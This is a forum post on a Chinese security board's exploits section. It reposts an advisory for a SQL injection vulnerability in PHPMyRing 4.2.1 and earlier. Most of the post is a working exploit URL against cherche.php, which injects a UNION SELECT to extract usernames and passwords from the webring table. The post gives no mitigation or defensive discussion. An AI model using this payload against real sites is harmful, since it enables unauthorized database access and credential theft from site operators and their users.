邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » PHPMyRing <= 4.2.1 (cherche.php) Remote SQL Injection Vulnerability [查看完整版本]

pub!1c 2006-10-30 11:59

PHPMyRing <= 4.2.1 (cherche.php) Remote SQL Injection Vulnerability

[code]
*******************************************************************************
# Title  :  PHP My Ring <= 4.2.1 (cherche.php) Remote SQL Injection Vulnerability
# Author :  ajann
*******************************************************************************

###http://[target]/[path]/cherche.php?limite=-1%20union%20select%200,pseudo,0,mdp,0,0%20from%20webring/*&mots=%20&where=description

# ajann,Turkey
# ...

# Im not Hacker!


[/code]

查看完整版本: PHPMyRing &lt;= 4.2.1 (cherche.php) Remote SQL Injection Vulnerability

© 1999-2008 EvilOctal Security Team